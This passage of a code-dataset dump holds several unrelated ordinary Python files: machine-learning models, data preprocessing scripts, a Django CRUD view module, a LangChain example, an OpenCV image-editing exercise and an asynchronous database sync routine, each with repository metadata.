(lstm)multi_state= ((h, c), (h, c)), (gru)multi_state= (h, h) h.shape= [batch_size, hide_size]\n outputs, multi_state = recurrentnn.dynamic_rnn(cells, x, max_time= 5) #若特征数24则分成6份,若特征数20则分成5份\n # LSTM\n # result = multi_state[-1].h\n # GRU\n result = multi_state[-1]\n # 生成FCNN对象\n\n with tf.name_scope('fc'):\n fcnn = FCNN(result, keep_prob=1.0)\n net_1 = fcnn.per_layer(arg_dict['w_1'], arg_dict['b_1'])\n net_2 = fcnn.per_layer(arg_dict['w_2'], arg_dict['b_2'], param= net_1)\n out = fcnn.per_layer(arg_dict['w_3'], arg_dict['b_3'], param= net_2, name= name)\n return out\n\ndef stacking_FC(x, arg_dict, name):\n '''\n 元学习器为两层全连接层\n :param x: Tensor, 所有子学习器生成的数据集\n :param arg_dict: 权重矩阵以及偏置值散列表\n :param name: 计算节点命名\n :return: 全连接网络输出, shape= [1]\n '''\n #生成FCNN对象\n fcnn = FCNN(x)\n net_1 = fcnn.per_layer(arg_dict['w_sub_1'], arg_dict['b_sub_1'])\n net_2 = fcnn.per_layer(arg_dict['w_sub_2'], arg_dict['b_sub_2'], param= net_1)\n net_3 = fcnn.per_layer(arg_dict['w_sub_3'], arg_dict['b_sub_3'], param= net_2, name= name)\n return net_3","repo_name":"tonylibing/ProximityDetection","sub_path":"cnn_rnn/sub_learning.py","file_name":"sub_learning.py","file_ext":"py","file_size_in_byte":3608,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"} +{"seq_id":"14197883760","text":"import pandas as pd\nimport pickle\nimport os\nimport fnmatch\n\ncolumns = ['name', 'type', 'priority']\n\ngeneral_company_attributes = ['location', 'category', 'stage', 'social_media', 'age',\n 'create_time', 'close_time', 'employees', 'type']\nmeta_information_attributes = ['name', 'URL', 'update_time', 'description']\n\ndata = {}\n\n# 1: StartUs, 2: Startupers, 3: Company House, 4: News Website\nfor attribute in general_company_attributes:\n data[attribute] = ['General Company', [4, 1, 3, 2]]\nfor attribute in meta_information_attributes:\n data[attribute] = ['Meta Information', [4, 1, 3, 2]]\n\nwith open('attributes.pickle', 'wb') as file:\n pickle.dump(data, file)\n\nattributes = meta_information_attributes + general_company_attributes\nattributes.append('source')\n\n\ndef search_merge(old, new, new_priority, attributes):\n source = old['source'].replace(' ', '')\n for index in new.index:\n if index in old.index:\n old_priority = 
int(source[old.index.get_loc(index)])\n priority = attributes[index]\n if old_priority == 0 or priority[1].index(new_priority) < priority[1].index(old_priority):\n old[index] = new[index]\n return old\n\ndef find_path(dir):\n fileList = []\n # 遍历项目中的所有文件和文件夹\n for root, dirs, files in os.walk(dir):\n for file in files:\n # 使用fnmatch模块的fnmatch函数进行文件名匹配\n if fnmatch.fnmatch(file, '*info*'):\n # 打印匹配到的文件路径\n file_path = os.path.join(root, file)\n # file_path.replace('/', '//')\n print(file_path)\n fileList.append(file_path)\n return fileList\n\n\ndef merge_info(direct):\n fileList = find_path(direct)\n columns = attributes\n data = pd.DataFrame([], columns=columns)\n for file in fileList:\n df = pd.read_csv(file)\n data = pd.concat([data, df])\n\n data_unique = data.drop_duplicates(subset=['name'])\n data_unique.to_csv('./data/org_info.csv', encoding='utf-8', index=False)","repo_name":"csynbiosys/dissertations-2023-info","sub_path":"Jiayan_liu_find/data_preprocessing.py","file_name":"data_preprocessing.py","file_ext":"py","file_size_in_byte":2096,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"} +{"seq_id":"2592806884","text":"# Jogar um dado de 6 lados por n vezes\n# verificar se o numero retornado pelo dado é par ou impar\n# se o numero for impar, continue a verificação\n# se o numero for par, exiba uma mensagem de 'ACERTOU'\n# se o numero do dado for impar, chame o else e imprima \"IMPAR\"\nfrom random import randint\n\n\ndef sort_dado():\n return randint(1, 6)\n\n\nif __name__ == \"__main__\":\n dado = sort_dado()\n for x in range(7):\n if x % 2 == 1:\n continue\n if x == dado:\n print(\"Você acertou! numero: \", x, \"dado: \", dado)\n break\n else:\n print(\"Você errou! dado: \", dado)\n","repo_name":"V1ctorW1ll1an/curso_python","sub_path":"secao_07_estruturas_de_controle/desafio_dado.py","file_name":"desafio_dado.py","file_ext":"py","file_size_in_byte":615,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"} +{"seq_id":"6329090456","text":"#!/usr/bin/env python3.6\n\nimport os\nimport numpy as np\nimport torch\nfrom easypbr import *\nfrom dataloaders import *\n\n\npred_folder=\"/media/rosu/Data/data/semantic_kitti/predictions/after_icra_experiments_fixed_deform_none/test\"\n\nout_folder=\"/media/rosu/Data/data/semantic_kitti/for_server/after_icra_experiments_fixed_deform_none\"\n\n\nconfig_file=\"lnn_compare_semantic_kitti.cfg\"\nconfig_path=os.path.join( os.path.dirname( os.path.realpath(__file__) ) , '../../config', config_file)\nview=Viewer.create(config_path)\nloader=DataLoaderSemanticKitti(config_path)\nloader.start()\n\n\n#inside the pred folder we must go though all of the sequences and read the .label and then write it to binary\nsequences = [ f.path for f in os.scandir(pred_folder) if f.is_dir() ]\nprint(\"sequences is \", sequences)\nfor seq_folder in sequences:\n seq=os.path.basename(seq_folder)\n out_folder_with_sequences=os.path.join(out_folder, \"sequences\", seq, \"predictions\" )\n print(\"out_folder_with_sequences \", out_folder_with_sequences)\n os.makedirs(out_folder_with_sequences, exist_ok=True)\n files = [f for f in os.listdir(seq_folder) if os.path.isfile(os.path.join(seq_folder, f))]\n nr_files_for_seq=0\n for file_basename in files:\n file=os.path.join(seq_folder, file_basename)\n name_no_basename = os.path.splitext(file)[0]\n extension = os.path.splitext(file)[1]\n if extension==\".label\":\n nr_files_for_seq+=1\n labels = np.loadtxt(file)\n 
out_file=os.path.join(out_folder_with_sequences, file_basename)\n # print(\"writing in\", out_file)\n f= open(out_file,\"w+\")\n labels=labels.astype(np.int32)\n labels.tofile(f)\n\n #sanity check \n a = np.fromfile(out_file, dtype=np.uint32)\n print(\"a is \", a)\n print(\"labels is \", labels)\n diff = (a!=labels).sum()\n print(\"diff is\", diff)\n\n #read also the gt\n if(loader.has_data()): \n cloud=loader.get_cloud()\n mesh=Mesh( os.path.join(out_folder_with_sequences, (name_no_basename+\"_gt.ply\") ) )\n mesh.L_pred=a\n mesh.m_label_mngr=cloud.m_label_mngr\n mesh.m_vis.set_color_semanticpred()\n Scene.show(mesh,\"mesh\")\n view.update()\n\n \n \n\n\n\n\n print(\"nr_file_for_seq\", nr_files_for_seq)\n\n\n","repo_name":"AIS-Bonn/lattice_net","sub_path":"latticenet_py/misc/prepare_submission_semantickitti.py","file_name":"prepare_submission_semantickitti.py","file_ext":"py","file_size_in_byte":2394,"program_lang":"python","lang":"en","doc_type":"code","stars":45,"dataset":"github-code","pt":"76"} +{"seq_id":"42228114234","text":"from wsntk.models import NoConsumption, ExponentialConsumption\n\nfrom abc import ABCMeta, abstractmethod\nfrom numpy.random import rand\n\nRADIO_CONFIG = {\"DEFAULT\": {\"min_tx_power\": -15.0, \"max_tx_power\": 27.0, \"rx_sensitivity\": -80.0, \"frequency\": 933e6},\n \"ESP32-WROOM-32U\": {\"min_tx_power\": -12.0, \"max_tx_power\": 9.0, \"rx_sensitivity\": -97.0, \"frequency\": 2.4e9}}\n\nSENSOR_MAX_ENERGY = 100\nSENSOR_MIN_ENERGY = 0.1\n\nclass BaseNode(metaclass=ABCMeta):\n\t\"\"\"Base class for sensor node.\"\"\"\n\n\tdef __init__(self, dimensions):\n\t\t\n\t\tself.dimensions = dimensions\n\t\tself._init_node()\n\n\tdef _init_node(self):\n\t\tndim = len(self.dimensions)\n\t\tself.position = rand(ndim) * self.dimensions\n\n\tdef set_position(self, position):\n\t\t\"\"\"\n\t\tSet node position\n\t\t\n\t\tParameters\n\t\t----------\n\t\tposition : tuple of Double\n\t\t The x and y position of the sensor.\n\t\t\n\t\tReturns\n\t\t-------\n\t\tNo data returned\n\t\t\"\"\"\n\t\tndim = len(self.dimensions)\n\n\t\tif(ndim != len(position)):\n\t\t\traise ValueError(\"Position lenght different then expected. 
Expected %s, received %s.\" %(ndim, len(position))) \n\t\t\n\t\tfor index in range(ndim):\n\t\t\tif (position[index] > self.dimensions[index]):\n\t\t\t\traise ValueError(\"Position exceeded dimensions limits.\")\n\t\t\n\t\tself.position = position \n\t\t\n\tdef get_position(self):\n\t\t\"\"\"\n\t\tGet node position\n\t\t\n\t\tParameters\n\t\t----------\n\t\tNo parameters.\n\t\t\n\t\tReturns\n\t\t-------\n\t\tTuple of Double\n\t\t The current x and y position of the sensor\n\t\t\"\"\"\n\t\treturn self.position\n\n\tdef _update_position(self):\n\t\t\"\"\" Update the sensor position based on mobility models \"\"\"\n\t\t#ndim = len(self.position)\n\t\t#step = 0.1*rand(ndim)\n\t\t#self.position = self.position + step\n\t\treturn self.position\n\n\t@abstractmethod\n\tdef __iter__(self):\n\t\t\"\"\"Used to return an iteractor from a node\"\"\"\n\t\traise NotImplementedError\n\n\t@abstractmethod\n\tdef __next__(self):\n\t\t\"\"\"Interator next\"\"\"\n\t\traise NotImplementedError\n\nclass SensorNode(BaseNode):\n\t\"\"\"\n\tSensor node class.\n\t\t\n\tRequired arguments:\n\t\t\n\t\t*dimensions*:\n\t\tTuple of doubles, the area limits of the sensor.\n\t\t \n\t\t*radio*:\n\t\tEnumerator , the radio type to be used in the sensor.\n\t\t\n\t\t*consumption*\n\t\tString, the energy consumption model.\n\t\t\n\t\t*scaling*\n\t\tDouble, a hardware-dependent and battery-dependent proportionality constant that converts transmition power into consumed energy.\n\t\t\t\n\t\t\tunits of energy = tx_power*scaling \n\t\"\"\"\n\t\n\tconsumption_models = {\n\t\t\"None\": (NoConsumption,),\n\t\t\"Exponential\": (ExponentialConsumption,),\n\t}\n\t\n\tdef __init__(self, dimensions, radio = \"DEFAULT\", consumption = \"None\", scaling = 1.0):\n\t\t\n\t\tsuper(SensorNode, self).__init__(dimensions)\n\t\t#initialize radio configuration\n\t\tself._set_radio_config(radio)\n\t\t#initialize consumption model\n\t\tself.cons_model = self._set_consumption(consumption, scaling)\n\t\t# set node as active\n\t\tself.activity = 1\n\t\t#set maximm residual energy\n\t\tself.residual = SENSOR_MAX_ENERGY\n\t\t\n\tdef _set_radio_config(self, radio_type):\n\t\t\"\"\" Collect the radio parameters used in the sensor \"\"\"\n\n\t\tradio_params = self._get_radio_params(radio_type)\n\t\tfor param in radio_params: \n\t\t\tif param == \"max_tx_power\":\n\t\t\t self.max_tx_power = radio_params[param]\n\t\t\telif param == \"min_tx_power\":\n\t\t\t self.min_tx_power = radio_params[param]\n\t\t\telif param == \"rx_sensitivity\":\n\t\t\t self.rx_sensitivity = radio_params[param]\n\t\t\telif param == \"frequency\":\n\t\t\t self.frequency = radio_params[param]\n\t\t\telse:\n\t\t\t\traise ValueError(\"Radio parameter not expected: %s.\" %(param))\n\t\t\n\t\t#initialize radio with maximun tx_power \n\t\tself.tx_power = self.max_tx_power \n\n\tdef _set_consumption(self, consumption, scaling):\n\t\t\"\"\"Set ``Consumption Class`` object for str ``consumption``. \"\"\"\n\t\ttry:\n\t\t\tmodel_ = self.consumption_models[consumption]\n\t\t\tmodel_class, args = model_[0], model_[1:]\n\t\t\tif consumption in ('Exponential'):\n\t\t\t\targs = (scaling,)\n\t\t\treturn model_class(*args)\n\t\texcept KeyError as e:\n\t\t\traise ValueError(\"The consumption model %s is not supported. 
\" % consumption) from e\n\t\t\t\n\tdef _get_radio_params(self, radio_type):\n\t\t\"\"\" Retrieve the radio parameters based on specified type \"\"\"\n\t\tradio_type = str(radio_type).upper()\n\t\ttry:\n\t\t\treturn RADIO_CONFIG[radio_type]\n\t\texcept KeyError as e:\n\t\t\traise ValueError(\"Radio %s is not supported.\" % radio_type) from e\n\n\tdef _update_energy(self):\n\t\t\"\"\" Update the sensor energy based on consumption models \"\"\"\n\t\t\n\t\tself.residual = self.residual*self.cons_model.consumption(self.tx_power)\n\t\t\t\t\t\n\t\treturn self.residual\n\n\tdef _update_activity(self):\n\t\t\"\"\" Update the sensor life status based on current energy residual\"\"\"\n\t\tif self.residual > SENSOR_MIN_ENERGY:\n\t\t\tself.activity = 1\t\t\n\t\telse:\n\t\t\tself.activity = 0\n\t\t\n\t\treturn self.activity\t\n\n\tdef set_txpower(self, tx_power):\n\t\t\"\"\"\n\t\tSet radio transmission power\n\t\t\n\t\tParameters\n\t\t----------\n\t\ttx_power : {double}\n\t\t\tTransmission power to be configured in the radio\n\t\t\n\t\tReturns\n\t\t-------\n\t\tNo data returned\n\t\t\"\"\"\n\t\t\n\t\tif((tx_power >= self.min_tx_power) and (tx_power <= self.max_tx_power)):\n\t\t\tself.tx_power = tx_power \n\t\telse:\n\t\t\traise ValueError(\"Parameter out of radio power specification. Expected value from %s dBm to %s dBm.\" %(self.min_tx_power, self.max_tx_power))\n\t\t\t\t\t\t\n\n\tdef get_txpower(self):\n\t\t\"\"\"\n\t\tGet radio transmission power\n\t\t\n\t\tParameters\n\t\t----------\n\t\tNo parameters\n\t\t\n\t\tReturns\n\t\t-------\n\t\tdouble number\n\t\t\tThe current configured transmission power\n\t\t\"\"\"\n\t\treturn self.tx_power\n\n\tdef get_rxsensitivity(self):\n\t\t\"\"\"\n\t\tGet radio receiver sensitivity\n\t\t\n\t\tParameters\n\t\t----------\n\t\tNo parameters\n\t\t\n\t\tReturns\n\t\t-------\n\t\tdouble number\n\t\t\tThe current configured receiver sensitivity\n\t\t\"\"\"\n\t\treturn self.rx_sensitivity\n\n\tdef get_frequency(self):\n\t\t\"\"\"\n\t\tGet the radio frequency\n\t\t\n\t\tParameters\n\t\t----------\n\t\tNo parameters\n\t\t\n\t\tReturns\n\t\t-------\n\t\tdouble number\n\t\t\tThe current configured receiver sensitivity\n\t\t\"\"\"\n\t\treturn self.frequency\n\t\n\tdef get_activity(self):\n\t\t\"\"\"\n\t\tGet the sensor activity status\n\t\t\n\t\tParameters\n\t\t----------\n\t\tNo parameters\n\t\t\n\t\tReturns\n\t\t-------\n\t\tinteger number\n\t\t\tThe current sensor activity status: 0 -> inactive, 1 -> active\n\t\t\"\"\"\n\t\treturn self.activity\n\t\t\n\tdef __iter__(self):\n\t\t\"\"\"Interator\"\"\"\n\t\treturn self\n\n\tdef __next__(self):\n\t\tposition = self._update_position()\n\t\tenergy = self._update_energy()\n\t\tactivity = self._update_activity()\n\t\treturn position, energy, activity\n\n\n\n","repo_name":"edielsonpf/wsn-toolkit","sub_path":"wsntk/network/_sensor.py","file_name":"_sensor.py","file_ext":"py","file_size_in_byte":6342,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"} +{"seq_id":"74802241843","text":"from django import forms\nfrom django.shortcuts import render, redirect, get_object_or_404\nfrom django.utils.decorators import method_decorator\nfrom django.contrib.auth.decorators import login_required\nfrom django.urls import reverse_lazy, reverse\nfrom django.views.generic import FormView, ListView, CreateView, UpdateView, DeleteView, DetailView\nfrom django.core.paginator import Paginator, PageNotAnInteger, EmptyPage\nfrom django.conf import settings\nfrom django.db import transaction\n\n# specific to 
this view\nfrom common.models import CmnPaymentMethods\nfrom common.sysutil import get_sequenceval\nfrom common.table_gen import formfilter_queryset, general_exclude_list\nfrom common.moduleattributes.table_fields import CMN_PAYMENT_METHODS\n\nMODEL = CmnPaymentMethods\nPK_NAME = MODEL._meta.pk.name\nnon_editable_list = [field.name for field in MODEL._meta.fields if not field.editable]\n\nexclude_list = general_exclude_list + non_editable_list\n\nform_field_list = [field for field in CMN_PAYMENT_METHODS['fields'] if field not in exclude_list]\n\nform_field_dict = {x[0]: x[1] for x in list(zip(CMN_PAYMENT_METHODS['fields'], CMN_PAYMENT_METHODS['headers'])) if\n x[0] in form_field_list}\n\n\nclass PaymentMethodForm(forms.ModelForm):\n class Meta:\n model = MODEL\n fields = form_field_list\n labels = form_field_dict\n\n def __init__(self, *args, **kwargs):\n super(PaymentMethodForm, self).__init__(*args, **kwargs)\n for field in MODEL._meta.fields:\n if field.name in form_field_list and field.name not in []:\n if field.get_internal_type() == 'CharField':\n self.fields[field.name].widget.attrs.update({'style': 'text-transform:uppercase'})\n\n def clean(self):\n self._validate_unique = True\n for field in MODEL._meta.fields:\n if field.name in form_field_list and field.name not in []:\n if field.get_internal_type() == 'CharField':\n self.cleaned_data[field.name] = self.cleaned_data[field.name].upper()\n return self.cleaned_data\n\n\nclass DetailForm(forms.ModelForm):\n class Meta:\n model = MODEL\n fields = '__all__'\n widgets = {x: forms.TextInput(attrs={'readonly': True, }) for x in form_field_list}\n\n\nAPPNAME = 'setup'\nURLPREFIX = '/' + APPNAME + '/paymentmethods{0}/'\nSLUG_FIELD = PK_NAME\nSLUG_URL_KWARG = PK_NAME\nTEMPLATE_PREFIX = 'payment_methods/paymentmethods-{0}.html'\nORDERING = (PK_NAME,)\nFORM_CLASS = PaymentMethodForm\nREC_IN_PAGE = settings.PUB_PAGE_LINES\nREVERSE = \"setup:paymentmethods_list\"\nMYCONTEXT = {'create': URLPREFIX.format('_create'),\n 'update': URLPREFIX.format('_update'),\n 'delete': URLPREFIX.format('_delete'),\n 'list': URLPREFIX.format('_list'),\n 'title': 'Payment Methods',\n }\nsearch_field_list = ['pmnt_code', 'pmnt_method',]\nlistview_filed_list = ['sl_no','pmnt_code','pmnt_method']\nlistview_filed_dict = {x[0]: x[1] for x in list(zip(CMN_PAYMENT_METHODS['fields'], CMN_PAYMENT_METHODS['headers'])) if\n all([x[0] in form_field_list, x[0] not in ['validation_criteria', ]])}\n\n\nclass SearchForm(forms.ModelForm):\n class Meta:\n model = MODEL\n fields = search_field_list\n labels = form_field_dict\n widgets = {x: forms.TextInput(attrs={'required': False, }) for x in search_field_list}\n\n def __init__(self, *args, **kwargs):\n super(SearchForm, self).__init__(*args, **kwargs)\n for field in search_field_list:\n self.fields[field].required = False\n\n\n@method_decorator(login_required, name='dispatch')\nclass PaymentMethodsListView(ListView):\n model = MODEL\n template_name = TEMPLATE_PREFIX.format('l')\n # context_object_name = 'data'\n ordering = (PK_NAME,)\n paginate_by = REC_IN_PAGE\n\n def get_context_data(self, **kwargs):\n context = super(PaymentMethodsListView, self).get_context_data(**kwargs)\n print('CONTEXT - START --->',context)\n print('self.request.GET --->', self.request.GET)\n context['listview_filed_dict'] = listview_filed_dict\n methods_list = CmnPaymentMethods.objects.all().order_by(PK_NAME)\n\n # context['search_field_dict'] = {x: {'label': form_field_dict[x], 'value': ''} for x in search_field_list}\n context['search_form'] = 
SearchForm()\n if 'list_filter' in self.request.GET:\n methods_list = formfilter_queryset(self.request.GET, methods_list, search_field_list)\n context['search_form'] = SearchForm(self.request.GET)\n\n if len(methods_list)==1:\n context['details'] = DetailForm(instance=methods_list[0])\n elif self.request.GET.get('paymentmethod_id'):\n print('paymentmethod_id -->', self.request.GET.get('paymentmethod_id'))\n methods_list = CmnPaymentMethods.objects.filter(pmnt_method_id=self.request.GET.get('paymentmethod_id'))\n context['details'] = DetailForm(instance=methods_list[0])\n\n if len(methods_list)>REC_IN_PAGE:\n page = self.request.GET.get('page')\n paginator = Paginator(methods_list, self.paginate_by)\n try:\n methods_list = paginator.page(page)\n except PageNotAnInteger:\n methods_list = paginator.page(1)\n except EmptyPage:\n methods_list = paginator.page(paginator.num_pages)\n\n context['methods_list'] = methods_list\n context['request'] = self.request\n context['MYCONTEXT'] = MYCONTEXT\n print('CONTEXT - END --->', context)\n return context\n\n\n@method_decorator(login_required, name='dispatch')\nclass PaymentMethodsCreateView(CreateView):\n model = MODEL\n form_class = FORM_CLASS\n template_name = TEMPLATE_PREFIX.format('c')\n\n def form_valid(self, form):\n self.object = form.save(commit=False)\n self.object.pmnt_method_id = get_sequenceval('cmn_payment_methods_s.nextval')\n self.object.save()\n return super().form_valid(form)\n\n def get_success_url(self):\n return reverse(REVERSE)\n\n\n@method_decorator(login_required, name='dispatch')\nclass PaymentMethodsUpdateView(UpdateView):\n model = MODEL\n form_class = FORM_CLASS\n template_name = TEMPLATE_PREFIX.format('u')\n slug_field = PK_NAME\n slug_url_kwarg = PK_NAME\n\n def get_success_url(self):\n return reverse(REVERSE)\n\n\n@method_decorator(login_required, name='dispatch')\nclass PaymentMethodsDeleteView(DeleteView):\n model = MODEL\n form_class = FORM_CLASS\n template_name = TEMPLATE_PREFIX.format('d')\n slug_field = PK_NAME\n slug_url_kwarg = PK_NAME\n\n def get_success_url(self):\n return reverse(REVERSE)","repo_name":"ashokpanigrahi88/datahubpython","sub_path":"setup/templates/payment_methods/payment_method_views.py","file_name":"payment_method_views.py","file_ext":"py","file_size_in_byte":6714,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"75"} +{"seq_id":"34457352433","text":"#!/usr/bin/env python3\n\"\"\"\ncreates the training operation for a neural network\nin tensorflow using the Adam optimization algorithm\n\"\"\"\nimport tensorflow as tf\n\n\ndef create_Adam_op(loss, alpha, beta1, beta2, epsilon):\n \"\"\"\n @loss is the loss of the network\n @alpha is the learning rate\n @beta1 is the weight used for the first moment\n @beta2 is the weight used for the second moment\n @epsilon is a small number to avoid division by zero\n Returns: the Adam optimization operation\n \"\"\"\n # Create global step variable\n global_step = tf.Variable(0, trainable=False)\n\n # Define Adam optimizer with given hyperparameters\n optimizer = tf.train.AdamOptimizer(learning_rate=alpha, beta1=beta1,\n beta2=beta2, epsilon=epsilon)\n\n # Compute gradients and apply them using the Adam optimizer\n grads_and_vars = optimizer.compute_gradients(loss)\n train_op = optimizer.apply_gradients(grads_and_vars,\n global_step=global_step)\n\n return 
train_op\n","repo_name":"Facundoblanco10/holbertonschool-machine_learning","sub_path":"supervised_learning/optimization/10-Adam.py","file_name":"10-Adam.py","file_ext":"py","file_size_in_byte":1053,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"75"} +{"seq_id":"32129595896","text":"from langchain.chains import LLMChain, SequentialChain\nfrom langchain.prompts import PromptTemplate\n\nfrom langchain_poc.examples.langchain.base import BaseExample\n\n\nclass SequentialChainExample(BaseExample):\n story_template = \"\"\"\n As a children's book writer, please come up with a simple and short (90 words)\n lullaby based on the location {location}\n and the main character {name}\n\n STORY:\n \"\"\"\n\n translation_template = \"\"\"\n Translate the {story} into {language}. Make sure the language is simple and fun.\n \n TRANSLATION:\n \"\"\"\n\n def run_example(self) -> None:\n self.chat_model.temperature = 0.5\n\n story_chain = self._make_story_chain()\n translated_story = self._make_translate_story_chain()\n\n overall_chain = SequentialChain(\n chains=[story_chain, translated_story],\n input_variables=[\"location\", \"name\", \"language\"],\n output_variables=[\"story\", \"translated\"],\n )\n response = overall_chain(\n inputs={\n \"location\": \"Ukraine\",\n \"name\": \"Ira\",\n \"language\": \"Ukrainian\",\n }\n )\n print(f\"Overall Chain response: {response}\")\n\n print(f\"Story Chain Output: {response['story']}\")\n print(f\"Translation Chain Output: {response['translated']}\")\n\n def _make_story_chain(self) -> LLMChain:\n story_prompt_template = PromptTemplate(\n input_variables=[\"location\", \"name\"],\n template=self.story_template,\n )\n return LLMChain(\n llm=self.chat_model,\n prompt=story_prompt_template,\n output_key=\"story\", # uses in SequentialChain(..., output_variables=[\"story\"])\n verbose=True,\n )\n\n def _make_translate_story_chain(self) -> LLMChain:\n translation_prompt_template = PromptTemplate(\n input_variables=[\"story\", \"language\"], template=self.translation_template\n )\n return LLMChain(\n llm=self.chat_model,\n prompt=translation_prompt_template,\n output_key=\"translated\",\n verbose=True,\n )\n","repo_name":"ZaslavkyDi/langchain-poc","sub_path":"langchain_poc/examples/langchain/chains/sequential_chain.py","file_name":"sequential_chain.py","file_ext":"py","file_size_in_byte":2178,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"75"} +{"seq_id":"10542060909","text":"import os\n\nimport pandas as pd\n\nimport src.read.base_reader as reader\n\n\"\"\"\nReading message log file and extract text or put them in pandas data frame\n\"\"\"\n\n\nclass PandasRead(reader.Read):\n\n def __init__(self, filepath, file_type=\"csv\", sep=\",\", header=0):\n \"\"\"\n :param filepath:\n :param type: optional filetype, to keep track of different types of files\n :param sep: optional separator, to extract columns\n :param header: optional header, from the file\n \"\"\"\n self._types = {\"csv\": self._read_csv, \"txt\": self._read_csv}\n self._filepath = filepath\n self._type = file_type\n self._sep = sep\n self._header = header\n if not os.path.isfile(filepath):\n raise FileNotFoundError(\n \"Most likely you passed the wrong file path: {filepath} while creating Read instance\".format(\n filepath=filepath))\n assert file_type in self._types\n self._df = self._types[self._type](self._filepath, self._sep, self._header)\n\n def data_frame(self):\n \"\"\"\n :return: dataframe which was populated 
when this class initialized\n \"\"\"\n return self._df\n\n def text(self, text_column):\n \"\"\"\n :param text_column: of the dataframe\n :return: array of the text messages\n \"\"\"\n df = self._df\n if text_column in df.columns:\n return \"\\n\".join(df[text_column].values)\n\n def _read_csv(self, filepath, sep, header):\n \"\"\"\n Helper private function to read to dataframe from csv\n :param filepath:\n :param sep:\n :param header:\n :return: pandas dataframe\n \"\"\"\n return pd.read_csv(filepath, sep=sep, header=header)\n","repo_name":"nikhilkhandelwal/stackoverflow-topic-classifier-okc","sub_path":"src/read/pandas_reader.py","file_name":"pandas_reader.py","file_ext":"py","file_size_in_byte":1750,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"75"} +{"seq_id":"44965240323","text":"# importing required libraries of opencv\nimport cv2\n#import matplotlib.pyplot as plt\n# reads an input image\nimg = cv2.imread('ex2.jpg',1)\n\n\ndef invert(image,name):\n for i in range(0, len(img)):\n for j in range(0,len(img[1])):\n for k in range(0,3):\n img[i,j,k] = 255 - img[i,j,k]\n\n cv2.imwrite('inv.jpg', img)\n\n\ndef brilho(image,name, val):\n for i in range(0, len(img)):\n for j in range(0,len(img[1])):\n #for k in range(0,3):\n img[i,j] = img[i,j] + val\n\n cv2.imwrite('bri.jpg', img)\n\nbrilho(img,'ex2.jpg', 40)\n#histr = cv2.calcHist([img],[0],None,[256],[0,256])\n\n\n#plt.plot(histr)\n#plt.show()\n","repo_name":"LuskaSaur/arvoree","sub_path":"teste.py","file_name":"teste.py","file_ext":"py","file_size_in_byte":670,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"75"} +{"seq_id":"72907806643","text":"import asyncio\nimport logging\nfrom config.zoneConfig import userConfig\nfrom datawrapper.dataBaseMgr import classDataBaseMgr\nfrom datawrapper.sqlBaseMgr import classSqlBaseMgr\nfrom lib.jsonhelp import classJsonDump\n\n\nfrom gmweb.utils.models import Base\ntbl = Base.metadata.tables[\"dj_repair\"]\n\n\n@asyncio.coroutine\ndef doCheck():\n engine = classSqlBaseMgr.getInstance().getEngine()\n\n with (yield from engine) as conn:\n # 检查写入信息\n var_aio_redis = classDataBaseMgr.getInstance().dictAioRedis[userConfig].objAioRedis\n\n try:\n new_repair_list = yield from classDataBaseMgr.getInstance().getRepairDataNewList(var_aio_redis)\n\n if len(new_repair_list) <= 0:\n pass\n else:\n for var_id in new_repair_list:\n try:\n if var_id is None:\n logging.info(repr(\"无新消息\"))\n continue\n\n yield from flushInsertToDb(var_id.decode(), conn)\n\n yield from classDataBaseMgr.getInstance().removeRepairDataNew(var_aio_redis, var_id)\n\n logging.info(\"Save new repair[{}]\".format(var_id))\n except Exception as e:\n logging.error(\"Save new repair exception, account=[{}], error=[{}]\".format(var_id, str(e)))\n\n except Exception as e:\n logging.error(str(e))\n finally:\n pass\n\n # 检查更新信息\n try:\n\n dirty_repair_list = yield from classDataBaseMgr.getInstance().getRepairDataDirtyList(var_aio_redis)\n\n if len(dirty_repair_list) <= 0:\n pass\n else:\n for var_id in dirty_repair_list:\n try:\n if var_id is None:\n logging.info(\"Id为空\")\n continue\n\n yield from flushUpdateToDb(var_id.decode(), conn)\n\n yield from classDataBaseMgr.getInstance().removeRepairDataKeyDirtyList(var_aio_redis, var_id)\n\n logging.info(\"Save dirty repair[{}]\".format(var_id))\n except Exception as e:\n logging.error(\"Save dirty repair exception, account=[{}], error=[{}]\".format(var_id, str(e)))\n\n except Exception as e:\n 
logging.error(str(e))\n finally:\n pass\n\n\n#########################\n@asyncio.coroutine\ndef flushInsertToDb(repairId: str, conn):\n # TODO 还需要完善dataBaseMgr中的接口\n\n objRepair = yield from classDataBaseMgr.getInstance().getOneRepairData(repairId)\n\n if objRepair is None:\n # TODO log\n return\n\n sql = tbl.insert().values(\n repairId=objRepair.strRepairId,\n create_time=objRepair.iTime,\n start_time=objRepair.iStartTime,\n end_time=objRepair.iEndTime,\n repairFlag=objRepair.iRepairFlag,\n accountId=objRepair.strAccountId,\n platform=objRepair.iPlatform\n )\n\n trans = yield from conn.begin()\n try:\n yield from conn.execute(sql)\n except Exception as e:\n logging.error(e)\n yield from trans.rollback()\n raise e\n else:\n yield from trans.commit()\n\n\n@asyncio.coroutine\ndef flushUpdateToDb(repairId: str, conn):\n # TODO 还需要完善dataBaseMgr中的接口\n\n objRepair = yield from classDataBaseMgr.getInstance().getOneRepairData(repairId)\n\n if objRepair is None:\n # TODO log\n logging.info(\"消息为空\")\n return\n\n sql = tbl.update().where(tbl.c.repairId == objRepair.strRepairId).values(\n repairId=objRepair.strRepairId,\n create_time=objRepair.iTime,\n start_time=objRepair.iStartTime,\n end_time=objRepair.iEndTime,\n repairFlag=objRepair.iRepairFlag,\n accountId=objRepair.strAccountId,\n platform=objRepair.iPlatform\n )\n trans = yield from conn.begin()\n try:\n yield from conn.execute(sql)\n except Exception as e:\n logging.exception(e)\n yield from trans.rollback()\n raise e\n else:\n yield from 